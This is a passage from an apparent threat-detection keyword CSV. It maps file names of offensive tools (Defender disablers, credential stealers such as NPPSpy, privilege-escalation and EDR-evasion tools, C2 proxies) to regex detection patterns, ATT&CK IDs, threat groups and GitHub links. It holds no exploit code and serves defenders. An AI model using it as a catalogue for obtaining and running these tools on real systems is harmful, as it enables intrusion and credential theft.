TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","16924" "*\nMethodNamespace=StandIn*",".{0,1000}\\nMethodNamespace\=StandIn.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","N/A","9","8","761","129","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z","16925" "*\no_defender.exe*",".{0,1000}\\no_defender\.exe.{0,1000}","offensive_tool_keyword","no_defender","disable windows defender. 
(through the WSC api)","T1089","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/es3n1n/no-defender","1","0","N/A","N/A","10","10","1907","13","2024-06-08T01:29:18Z","2024-05-23T05:18:38Z","16926" "*\NoAmci.exe*",".{0,1000}\\NoAmci\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","16927" "*\NoAmsi.ps1*",".{0,1000}\\NoAmsi\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","16928" "*\NoArgs.cpp*",".{0,1000}\\NoArgs\.cpp.{0,1000}","offensive_tool_keyword","NoArgs","NoArgs is a tool designed to dynamically spoof and conceal process arguments while staying undetected. It achieves this by hooking into Windows APIs to dynamically manipulate the Windows internals on the go. 
This allows NoArgs to alter process arguments discreetly.","T1055 - T1574 - T1112 - T1056","TA0005 - TA0040 - TA0009","N/A","N/A","Defense Evasion","https://github.com/oh-az/NoArgs","1","0","N/A","N/A","8","2","151","25","2024-05-07T20:38:34Z","2024-03-15T16:54:49Z","16929" "*\NoArgs.exe*",".{0,1000}\\NoArgs\.exe.{0,1000}","offensive_tool_keyword","NoArgs","NoArgs is a tool designed to dynamically spoof and conceal process arguments while staying undetected. It achieves this by hooking into Windows APIs to dynamically manipulate the Windows internals on the go. This allows NoArgs to alter process arguments discreetly.","T1055 - T1574 - T1112 - T1056","TA0005 - TA0040 - TA0009","N/A","N/A","Defense Evasion","https://github.com/oh-az/NoArgs","1","0","N/A","N/A","8","2","151","25","2024-05-07T20:38:34Z","2024-03-15T16:54:49Z","16930" "*\NoArgs.exe.config*",".{0,1000}\\NoArgs\.exe\.config.{0,1000}","offensive_tool_keyword","NoArgs","NoArgs is a tool designed to dynamically spoof and conceal process arguments while staying undetected. It achieves this by hooking into Windows APIs to dynamically manipulate the Windows internals on the go. This allows NoArgs to alter process arguments discreetly.","T1055 - T1574 - T1112 - T1056","TA0005 - TA0040 - TA0009","N/A","N/A","Defense Evasion","https://github.com/oh-az/NoArgs","1","0","N/A","N/A","8","2","151","25","2024-05-07T20:38:34Z","2024-03-15T16:54:49Z","16931" "*\NoArgs.exe.log*",".{0,1000}\\NoArgs\.exe\.log.{0,1000}","offensive_tool_keyword","NoArgs","NoArgs is a tool designed to dynamically spoof and conceal process arguments while staying undetected. It achieves this by hooking into Windows APIs to dynamically manipulate the Windows internals on the go. 
This allows NoArgs to alter process arguments discreetly.","T1055 - T1574 - T1112 - T1056","TA0005 - TA0040 - TA0009","N/A","N/A","Defense Evasion","https://github.com/oh-az/NoArgs","1","0","N/A","N/A","8","2","151","25","2024-05-07T20:38:34Z","2024-03-15T16:54:49Z","16932" "*\NoArgs_Encrypted.exe*",".{0,1000}\\NoArgs_Encrypted\.exe.{0,1000}","offensive_tool_keyword","NoArgs","NoArgs is a tool designed to dynamically spoof and conceal process arguments while staying undetected. It achieves this by hooking into Windows APIs to dynamically manipulate the Windows internals on the go. This allows NoArgs to alter process arguments discreetly.","T1055 - T1574 - T1112 - T1056","TA0005 - TA0040 - TA0009","N/A","N/A","Defense Evasion","https://github.com/oh-az/NoArgs","1","0","N/A","N/A","8","2","151","25","2024-05-07T20:38:34Z","2024-03-15T16:54:49Z","16933" "*\No-Consolation\source\*",".{0,1000}\\No\-Consolation\\source\\.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a Beacon Object File (BOF) that executes unmanaged PEs inline and retrieves their output without allocating a console (i.e spawning conhost.exe)","T1055 - T1129","TA0005 - TA0003","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Defense Evasion","https://github.com/fortra/No-Consolation","1","0","N/A","N/A","9","6","593","68","2024-10-23T16:25:21Z","2023-11-06T22:01:42Z","16934" 
"*\no-defender.exe*",".{0,1000}\\no\-defender\.exe.{0,1000}","offensive_tool_keyword","no_defender","disable windows defender. (through the WSC api)","T1089","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/es3n1n/no-defender","1","0","N/A","N/A","10","10","1907","13","2024-06-08T01:29:18Z","2024-05-23T05:18:38Z","16936" "*\no-defender.sln*",".{0,1000}\\no\-defender\.sln.{0,1000}","offensive_tool_keyword","no_defender","disable windows defender. (through the WSC api)","T1089","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/es3n1n/no-defender","1","0","N/A","N/A","10","10","1907","13","2024-06-08T01:29:18Z","2024-05-23T05:18:38Z","16937" "*\no-defender.vcxproj*",".{0,1000}\\no\-defender\.vcxproj.{0,1000}","offensive_tool_keyword","no_defender","disable windows defender. (through the WSC api)","T1089","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/es3n1n/no-defender","1","0","N/A","N/A","10","10","1907","13","2024-06-08T01:29:18Z","2024-05-23T05:18:38Z","16938" "*\no-defender-loader.exe*",".{0,1000}\\no\-defender\-loader\.exe.{0,1000}","offensive_tool_keyword","no_defender","disable windows defender. (through the WSC api)","T1089","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/es3n1n/no-defender","1","0","N/A","N/A","10","10","1907","13","2024-06-08T01:29:18Z","2024-05-23T05:18:38Z","16939" "*\no-defender-loader.pdb*",".{0,1000}\\no\-defender\-loader\.pdb.{0,1000}","offensive_tool_keyword","no_defender","disable windows defender. (through the WSC api)","T1089","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/es3n1n/no-defender","1","0","N/A","N/A","10","10","1907","13","2024-06-08T01:29:18Z","2024-05-23T05:18:38Z","16940" "*\no-defender-loader.vcxproj*",".{0,1000}\\no\-defender\-loader\.vcxproj.{0,1000}","offensive_tool_keyword","no_defender","disable windows defender. 
(through the WSC api)","T1089","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/es3n1n/no-defender","1","0","N/A","N/A","10","10","1907","13","2024-06-08T01:29:18Z","2024-05-23T05:18:38Z","16941" "*\no-defender-loader\main.cpp*",".{0,1000}\\no\-defender\-loader\\main\.cpp.{0,1000}","offensive_tool_keyword","no_defender","disable windows defender. (through the WSC api)","T1089","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/es3n1n/no-defender","1","0","N/A","N/A","10","10","1907","13","2024-06-08T01:29:18Z","2024-05-23T05:18:38Z","16942" "*\NodeRelayConsoleExe_d64.exe*",".{0,1000}\\NodeRelayConsoleExe_d64\.exe.{0,1000}","offensive_tool_keyword","C3","Framework designed for red teams to create and manage custom C2 (Command and Control) channels. Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP - C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","0","N/A","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","16943" "*\Nofault.exe*",".{0,1000}\\Nofault\.exe.{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","10","6","525","82","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z","16944" "*\NoFilter.cpp*",".{0,1000}\\NoFilter\.cpp.{0,1000}","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. 
It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","0","N/A","N/A","9","3","298","48","2024-10-29T07:30:35Z","2023-07-30T09:25:38Z","16945" "*\NoFilter.exe*",".{0,1000}\\NoFilter\.exe.{0,1000}","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","0","N/A","N/A","9","3","298","48","2024-10-29T07:30:35Z","2023-07-30T09:25:38Z","16946" "*\NoFilter.sln*",".{0,1000}\\NoFilter\.sln.{0,1000}","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","0","N/A","N/A","9","3","298","48","2024-10-29T07:30:35Z","2023-07-30T09:25:38Z","16947" "*\NoFilter.vcxproj*",".{0,1000}\\NoFilter\.vcxproj.{0,1000}","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. 
It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","0","N/A","N/A","9","3","298","48","2024-10-29T07:30:35Z","2023-07-30T09:25:38Z","16948" "*\NoodMaker.exe*",".{0,1000}\\NoodMaker\.exe.{0,1000}","offensive_tool_keyword","NoodleRAT","AV signature of noodlerat malware","T1059.004 - T1078 - T1105 - T1100 - T1547.006","TA0003 - TA0005 - TA0010 - TA0011","N/A","N/A","Malware","https://www.trendmicro.com/en_us/research/24/f/noodle-rat-reviewing-the-new-backdoor-used-by-chinese-speaking-g.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","16949" "*\nopac.exe*",".{0,1000}\\nopac\.exe.{0,1000}","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tool","https://github.com/ricardojba/noPac","1","0","N/A","N/A","N/A","1","36","5","2021-12-19T17:42:12Z","2021-12-13T18:51:31Z","16950" "*\nopac.py*",".{0,1000}\\nopac\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","16951" "*\NoPowerShell*",".{0,1000}\\NoPowerShell.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. 
No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","16952" "*\NoPowerShell.*",".{0,1000}\\NoPowerShell\..{0,1000}","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","16953" "*\No-PowerShell.cs*",".{0,1000}\\No\-PowerShell\.cs.{0,1000}","offensive_tool_keyword","No-powershell","powershell script to C# (no-powershell)","T1059.001 - T1027 - T1500","TA0002 - TA0004 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/gtworek/PSBits/blob/master/Misc/No-PowerShell.cs","1","0","N/A","N/A","8","10","3337","542","2025-03-12T19:59:23Z","2019-06-29T13:22:36Z","16954" "*\NoPowerShell.exe*",".{0,1000}\\NoPowerShell\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","16955" "*\NoPowerShell.exe*",".{0,1000}\\NoPowerShell\.exe.{0,1000}","offensive_tool_keyword","NoPowerShell","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","NoPowerShell","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","16956" "*\NoPowerShell.exe*",".{0,1000}\\NoPowerShell\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation 
tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","NoPowerShell","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","16957" "*\No-PowerShell.exe*",".{0,1000}\\No\-PowerShell\.exe.{0,1000}","offensive_tool_keyword","No-powershell","powershell script to C# (no-powershell)","T1059.001 - T1027 - T1500","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/blob/master/Misc/No-PowerShell.cs","1","0","N/A","N/A","8","10","3337","542","2025-03-12T19:59:23Z","2019-06-29T13:22:36Z","16958" "*\norton\getCredsnorton.h*",".{0,1000}\\norton\\getCredsnorton\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","16959" "*\norton\getCredsnorton2.h*",".{0,1000}\\norton\\getCredsnorton2\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","16960" "*\notavirus.exe*",".{0,1000}\\notavirus\.exe.{0,1000}","offensive_tool_keyword","tricky.lnk","VBS that creates a .lnk file spoofing the file extension with unicode chars that reverses the .lnk file extension. appends .txt to the end and changes the icon to notepad to make it appear as a textfile. When executed. 
the payload is a powershell webdl and execute","T1027 - T1036 - T1218.010","TA0002 - TA0003 - TA0008","N/A","N/A","Phishing","https://github.com/xillwillx/tricky.lnk","1","0","N/A","N/A","N/A","2","114","33","2020-12-19T23:42:10Z","2016-10-26T21:25:06Z","16961" "*\NovaLdr.exe",".{0,1000}\\NovaLdr\.exe","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","N/A","N/A","10","3","242","40","2024-06-29T10:34:48Z","2023-10-19T07:54:39Z","16962" "*\NoveLdr.exe",".{0,1000}\\NoveLdr\.exe","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. 
It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","N/A","N/A","10","3","242","40","2024-06-29T10:34:48Z","2023-10-19T07:54:39Z","16964" "*\npc.exe ?-server=*",".{0,1000}\\npc\.exe\s?\-server\=.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","N/A","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","16965" "*\npc.exe start*",".{0,1000}\\npc\.exe\sstart.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","N/A","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","16966" "*\NPPSpy.c*",".{0,1000}\\NPPSpy\.c.{0,1000}","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","0","N/A","N/A","10","10","3337","542","2025-03-12T19:59:23Z","2019-06-29T13:22:36Z","16967" "*\NPPSPY.dll*",".{0,1000}\\NPPSPY\.dll.{0,1000}","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). 
The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","0","N/A","N/A","10","10","3337","542","2025-03-12T19:59:23Z","2019-06-29T13:22:36Z","16968" "*\NPPSpy.exe*",".{0,1000}\\NPPSpy\.exe.{0,1000}","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","0","N/A","N/A","10","10","3337","542","2025-03-12T19:59:23Z","2019-06-29T13:22:36Z","16969" "*\NPPSpy.txt*",".{0,1000}\\NPPSpy\.txt.{0,1000}","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","0","N/A","N/A","10","10","3337","542","2025-03-12T19:59:23Z","2019-06-29T13:22:36Z","16970" "*\nps.exe install*",".{0,1000}\\nps\.exe\sinstall.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","N/A","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","16971" "*\nps.exe start*",".{0,1000}\\nps\.exe\sstart.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","N/A","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","16972" "*\nReversed shellcode:\n*",".{0,1000}\\nReversed\sshellcode\:\\n.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - 
T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","N/A","N/A","10","9","804","128","2024-07-02T10:24:43Z","2023-04-08T16:29:52Z","16973" "*-\nSharp RDP Hijack\n-*",".{0,1000}\-\\nSharp\sRDP\sHijack\\n\-.{0,1000}","offensive_tool_keyword","SharpRDPHijack","SharpRDPHijack is a proof-of-concept .NET/C# Remote Desktop Protocol (RDP) session hijack utility for disconnected sessions","T1021.001 - T1078.003 - T1059.001","TA0002 - TA0008 - TA0006","N/A","N/A","Lateral Movement","https://github.com/bohops/SharpRDPHijack","1","0","#content","N/A","10","5","480","80","2024-11-28T06:08:58Z","2020-07-06T02:59:46Z","16974" "*\nsocks.dll*",".{0,1000}\\nsocks\.dll.{0,1000}","offensive_tool_keyword","nsocks",".NET HttpClient proxy handler implementation for SOCKS proxies","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Scattered Spider* - Black Basta","C2","https://github.com/bbepis/Nsocks","1","0","N/A","N/A","8","10","3","0","2020-06-08T17:25:07Z","2020-03-28T09:00:22Z","16975" "*\nsocks.exe*",".{0,1000}\\nsocks\.exe.{0,1000}","offensive_tool_keyword","nsocks",".NET HttpClient proxy handler implementation for SOCKS proxies","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Scattered Spider* - Black Basta","C2","https://github.com/bbepis/Nsocks","1","0","N/A","N/A","8","10","3","0","2020-06-08T17:25:07Z","2020-03-28T09:00:22Z","16976" "*\NSudo.bat*",".{0,1000}\\NSudo\.bat.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","16979" "*\NSudo.exe*",".{0,1000}\\NSudo\.exe.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even 
bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","16980" "*\NSudo.exe*",".{0,1000}\\NSudo\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","16981" "*\NSudoC.exe*",".{0,1000}\\NSudoC\.exe.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","16982" "*\NSudoG.exe*",".{0,1000}\\NSudoG\.exe.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","16983" "*\ntdll_unhooking.exe*",".{0,1000}\\ntdll_unhooking\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and 
sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","16984" "*\ntdll_unhooking.exe*",".{0,1000}\\ntdll_unhooking\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","16985" "*\ntdlll-unhooking-collection*",".{0,1000}\\ntdlll\-unhooking\-collection.{0,1000}","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - 